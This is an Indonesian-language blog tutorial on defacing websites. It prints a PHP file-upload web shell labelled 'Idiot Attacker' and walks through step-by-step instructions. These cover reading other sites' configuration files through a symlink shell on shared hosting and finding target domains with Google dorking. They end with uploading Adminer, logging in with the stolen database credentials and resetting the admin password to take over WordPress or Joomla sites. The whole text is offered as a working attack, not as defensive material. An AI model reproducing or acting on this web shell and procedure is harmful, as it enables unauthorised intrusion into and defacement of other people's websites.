Tutorial deface dengan adminer config reset admin
Saya jelasin sedikit aja., entar selebihnya lihat videonya ya, dasarnya ini kita cari config di symlink shell, terus kita reset user pass webnya melalui adminer.Bahan-bahan
<?php
echo '<b>Idiot Attacker</b>';
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses !!!</b><br><br>'; }
else { echo '<b>Jancok, Upload GAGAL !!!</b><br><br>'; }
}
?>
- Web Shell Disana cari sendiri :p
Tutorial.
- Buka web yang udah kamu tanem shell
- Klik Idiot shell
- Klik use to generate php.ini
- Klik use to extract usernames
- Klik Lets start
- Kembali ke public_html, entar ada folder IDIOTSHELL - Klik
- Kalo ada config berati bisa di eksekusi, kalo gak ada gak usah diterusin
- Buka confignya
- Copy Server IP di atas menu shell tambahin /~username config
- Contoh username config idiot_wp , berati username nya idiot, lalu masukan ip/~username
- Contoh: 127.0.0.1/~idiot , entar klik sembarang, home, beranda dll pokok halaman depan webnya, nanti akan muncul domainya, biasanya kalo web joomla gak muncul, kamu pake google dorking aja.,
- kamu copy teks yang ada di web nya lalu cari dengan google dorking, selebihnya use your brain :)
- admin login wordpress : wp-admin , Joomla: administrator, lainya cari sendiri :p
- Upload adminer nya dan buka
- Masukan user, pass, nama db yang dari config tadi ke adminer, lalu login
- Setelah login ganti password adminnya, kalau passnya pake hash kamu ganti juga password mu dengan hash.,
- setelah itu login ke website target tadi dengan password hasil reset mu tadi
- dan selengkapnya lihat videonya aja ya hehehe
Tag: tutorial deface, deface, tutorial hack website, reset admin, adminer, config, deface step by step, php uploader
0 Komentar